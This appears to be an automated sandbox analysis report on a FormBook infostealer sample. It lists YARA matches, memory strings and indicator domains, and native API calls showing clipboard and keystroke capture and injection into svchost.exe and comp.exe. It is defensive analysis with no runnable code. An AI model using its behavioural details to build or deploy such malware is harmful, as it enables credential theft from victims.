                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: comp.exe, 00000007.00000002.3155140386.0000000003E2A000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: comp.exe, 00000007.00000002.3155140386.0000000003E2A000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2//
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2kk
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: comp.exe, 00000007.00000002.3151190257.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: comp.exe, 00000007.00000003.1874899555.0000000007846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: comp.exe, 00000007.00000002.3155140386.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000007.00000002.3156777600.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000317C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: comp.exe, 00000007.00000002.3156875239.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: comp.exe, 00000007.00000002.3155140386.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, comp.exe, 00000007.00000002.3156777600.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000317C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: comp.exe, 00000007.00000002.3155140386.000000000414E000.00000004.10000000.00040000.00000000.sdmp, OGbZSCDMTTWQqW.exe, 00000008.00000002.3153727346.000000000330E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.muasamgiare.click/dc08/?WLtH=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D4164
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003D4164
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003D3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003D3F66
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003C001C
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003ECABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003ECABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: This is a third-party compiled AutoIt script.0_2_00363B3A
                Source: SpCuEoekPa.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SpCuEoekPa.exe, 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6a627627-3
                Source: SpCuEoekPa.exe, 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_c2d92279-1
                Source: SpCuEoekPa.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3884353f-a
                Source: SpCuEoekPa.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5660d704-9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042C643 NtClose,3_2_0042C643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B60 NtClose,LdrInitializeThunk,3_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038735C0 NtCreateMutant,LdrInitializeThunk,3_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874340 NtSetContextThread,3_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874650 NtSuspendThread,3_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B80 NtQueryInformationFile,3_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BA0 NtEnumerateValueKey,3_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BE0 NtQueryValueKey,3_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BF0 NtAllocateVirtualMemory,3_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AB0 NtWaitForSingleObject,3_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AD0 NtReadFile,3_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AF0 NtWriteFile,3_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F90 NtProtectVirtualMemory,3_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FA0 NtQuerySection,3_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FB0 NtResumeThread,3_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FE0 NtCreateFile,3_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F30 NtCreateSection,3_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F60 NtCreateProcessEx,3_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E80 NtReadVirtualMemory,3_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EA0 NtAdjustPrivilegesToken,3_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EE0 NtQueueApcThread,3_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E30 NtWriteVirtualMemory,3_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DB0 NtEnumerateKey,3_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DD0 NtDelayExecution,3_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D00 NtSetInformationFile,3_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D10 NtMapViewOfSection,3_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D30 NtUnmapViewOfSection,3_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CA0 NtQueryInformationToken,3_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CC0 NtQueryVirtualMemory,3_2_03872CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CF0 NtOpenProcess,3_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C00 NtQueryInformationProcess,3_2_03872C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C60 NtCreateKey,3_2_03872C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873090 NtSetValueKey,3_2_03873090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873010 NtOpenDirectoryObject,3_2_03873010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038739B0 NtGetContextThread,3_2_038739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873D10 NtOpenProcessToken,3_2_03873D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873D70 NtOpenThread,3_2_03873D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD4340 NtSetContextThread,LdrInitializeThunk,7_2_02FD4340
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD4650 NtSuspendThread,LdrInitializeThunk,7_2_02FD4650
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2AF0 NtWriteFile,LdrInitializeThunk,7_2_02FD2AF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2AD0 NtReadFile,LdrInitializeThunk,7_2_02FD2AD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02FD2BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02FD2BE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02FD2BA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2B60 NtClose,LdrInitializeThunk,7_2_02FD2B60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02FD2EE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02FD2E80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2FE0 NtCreateFile,LdrInitializeThunk,7_2_02FD2FE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2FB0 NtResumeThread,LdrInitializeThunk,7_2_02FD2FB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2F30 NtCreateSection,LdrInitializeThunk,7_2_02FD2F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02FD2CA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02FD2C70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2C60 NtCreateKey,LdrInitializeThunk,7_2_02FD2C60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02FD2DF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02FD2DD0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02FD2D30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02FD2D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD35C0 NtCreateMutant,LdrInitializeThunk,7_2_02FD35C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD39B0 NtGetContextThread,LdrInitializeThunk,7_2_02FD39B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2AB0 NtWaitForSingleObject,7_2_02FD2AB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2B80 NtQueryInformationFile,7_2_02FD2B80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2EA0 NtAdjustPrivilegesToken,7_2_02FD2EA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2E30 NtWriteVirtualMemory,7_2_02FD2E30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2FA0 NtQuerySection,7_2_02FD2FA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2F90 NtProtectVirtualMemory,7_2_02FD2F90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2F60 NtCreateProcessEx,7_2_02FD2F60
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2CF0 NtOpenProcess,7_2_02FD2CF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2CC0 NtQueryVirtualMemory,7_2_02FD2CC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2C00 NtQueryInformationProcess,7_2_02FD2C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2DB0 NtEnumerateKey,7_2_02FD2DB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD2D00 NtSetInformationFile,7_2_02FD2D00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD3090 NtSetValueKey,7_2_02FD3090
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD3010 NtOpenDirectoryObject,7_2_02FD3010
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD3D70 NtOpenThread,7_2_02FD3D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_02FD3D10 NtOpenProcessToken,7_2_02FD3D10
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_00698FF0 NtCreateFile,7_2_00698FF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_00699160 NtReadFile,7_2_00699160
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_00699250 NtDeleteFile,7_2_00699250
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_006992F0 NtClose,7_2_006992F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 7_2_00699450 NtAllocateVirtualMemory,7_2_00699450
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003CA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_003CA1EF
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003B85B1 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_003B85B1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003C51BD
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038D9750_2_0038D975
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003821C50_2_003821C5
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003962D20_2_003962D2
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003E03DA0_2_003E03DA
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0039242E0_2_0039242E
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003825FA0_2_003825FA
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003BE6160_2_003BE616
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0036E6A00_2_0036E6A0
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003766E10_2_003766E1
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0039878F0_2_0039878F
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003788080_2_00378808
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003E08570_2_003E0857
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003968440_2_00396844
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003C88890_2_003C8889
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038CB210_2_0038CB21
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00396DB60_2_00396DB6
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00376F9E0_2_00376F9E
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003730300_2_00373030
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003831870_2_00383187
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038F1D90_2_0038F1D9
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003612870_2_00361287
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003814840_2_00381484
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003755200_2_00375520
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003876960_2_00387696
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003757600_2_00375760
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003819780_2_00381978
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00399AB50_2_00399AB5
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0036FCE00_2_0036FCE0
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0038BDA60_2_0038BDA6
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00381D900_2_00381D90
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_003E7DDB0_2_003E7DDB
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_0036DF000_2_0036DF00
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_00373FE00_2_00373FE0
                Source: C:\Users\user\Desktop\SpCuEoekPa.exeCode function: 0_2_016723D00_2_016723D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004185B33_2_004185B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004030D03_2_004030D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010E03_2_004010E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E0833_2_0040E083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004100A33_2_004100A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1C73_2_0040E1C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E1D33_2_0040E1D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004012403_2_00401240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401B473_2_00401B47
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401B503_2_00401B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042EC633_2_0042EC63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004024303_2_00402430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE7B3_2_0040FE7B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040FE833_2_0040FE83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004167B33_2_004167B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3F03_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039003E63_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA3523_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C02C03_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E02743_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039001AA3_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F81CC3_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038301003_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA1183_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C81583_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D20003_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C7C03_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038647503_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038407703_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385C6E03_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039005913_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038405353_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EE4F63_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E44203_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F24463_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F6BD73_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FAB403_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383EA803_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038429A03_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390A9A63_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038569623_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038268B83_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E8F03_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384A8403_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428403_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BEFA03_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832FC83_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384CFE03_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03882F283_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860F303_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E2F303_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4F403_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852E903_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FCE933_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEEDB3_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEE263_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840E593_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858DBF3_2_03858DBF
